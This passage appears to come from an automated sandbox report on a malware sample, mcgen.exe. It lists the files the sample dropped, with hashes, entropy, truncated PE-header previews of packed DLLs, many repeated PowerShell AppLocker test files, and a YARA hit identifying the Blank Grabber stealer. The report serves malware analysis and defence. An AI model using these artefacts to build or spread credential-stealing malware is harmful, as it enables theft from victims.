                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                                                                  MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                                                  SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                                                                  SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                                                                  SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):456
                                                                                                                                                                                                                                                                  Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                                                                  MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                                                                  SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                                                                  SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                                                                  SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                                                                  Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):27640
                                                                                                                                                                                                                                                                  Entropy (8bit):7.429887403983581
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:DaWVMhw2pYjGIm9GtaJyUFRYT2Ip4HCxf1mlzzTz:OKE4jGIm9GtmyUzR9YfIPv
                                                                                                                                                                                                                                                                  MD5:933DA5361079FC8457E19ADAB86FF4E0
                                                                                                                                                                                                                                                                  SHA1:51BCCF47008130BAADD49A3F55F85FE968177233
                                                                                                                                                                                                                                                                  SHA-256:ADFDF84FF4639F8A921B78A2EFCE1B89265DF2B512DF05CE2859FC3CC6E33EFF
                                                                                                                                                                                                                                                                  SHA-512:0078CD5DF1B78D51B0ACB717E051E83CB18A9DAF499A959DA84A331FA7A839EEFA303672D741B29FF2E0C34D1EF3F07505609F1102E9E86FAB1C9FD066C67570
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Ks{.*.(.*.(.*.(.R.(.*.(..).*.(..).*.(..).*.(..).*.(w..).*.(.*.(.*.(...).*.(w..).*.(w..).*.(w..(.*.(w..).*.(Rich.*.(................PE..d....WOg.........." ...*.0..........@.....................................................`......................................... ...L....................`..............l.......................................P...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):661360
                                                                                                                                                                                                                                                                  Entropy (8bit):7.993016249967087
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:12288:fnhOhXqE88i5E+P5p6YOU7hN8QtcsWO4qlD0kHpM7rLXF81PrtKtD1Gj40QeqG+e:fnWaI6lP5+whKQusF44ZQ3sZKt1n0QC/
                                                                                                                                                                                                                                                                  MD5:FF62332FA199145AAF12314DBF9841A3
                                                                                                                                                                                                                                                                  SHA1:714A50B5351D5C8AFDDB16A4E51A8998F976DA65
                                                                                                                                                                                                                                                                  SHA-256:36E1C70AFC8AD8AFE4A4F3EF4F133390484BCA4EA76941CC55BAC7E9DF29EEFD
                                                                                                                                                                                                                                                                  SHA-512:EEFF68432570025550D4C205ABF585D2911E0FF59B6ECA062DD000087F96C7896BE91EDA7612666905445627FC3FC974AEA7C3428A708C7DE2CA14C7BCE5CCA5
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7.x.7.x.7.x.>..;.x.&(y.5.x.&({.3.x.&(|.?.x.&(}.:.x.E/y.4.x.7.y...x..(p.6.x..(x.6.x..(..6.x..(z.6.x.Rich7.x.........................PE..d....WOg.........." ...*.....0............................................................`..............................................#..............................................................................@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\mcgen.exe
                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):269032
                                                                                                                                                                                                                                                                  Entropy (8bit):7.980717016340488
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:vFHvhlPKHwqcv9DqegNsKUuFLttFHg+hMrZ99hYN8khEc9v:vtJlyHwqSBqpNsKUuntFJhMF9HC84v
                                                                                                                                                                                                                                                                  MD5:867ECDE9FF7F92D375165AE5F3C439CB
                                                                                                                                                                                                                                                                  SHA1:37D1AC339EB194CE98548AB4E4963FE30EA792AE
                                                                                                                                                                                                                                                                  SHA-256:A2061EF4DF5999CA0498BEE2C7DD321359040B1ACF08413C944D468969C27579
                                                                                                                                                                                                                                                                  SHA-512:0DCE05D080E59F98587BCE95B26A3B5D7910D4CB5434339810E2AAE8CFE38292F04C3B706FCD84957552041D4D8C9F36A1844A856D1729790160CEF296DCCFC2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b..Q&...&...&.../fY. ...7...$...7...%...7.......7...+.......%...T...$...&...i.......'.......'.....5.'.......'...Rich&...................PE..d....WOg.........." ...*.........0..0....@...................................0............`..........................................+..X....)....... .......................+..$...................................0...@...........................................UPX0.....0..............................UPX1.........@......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
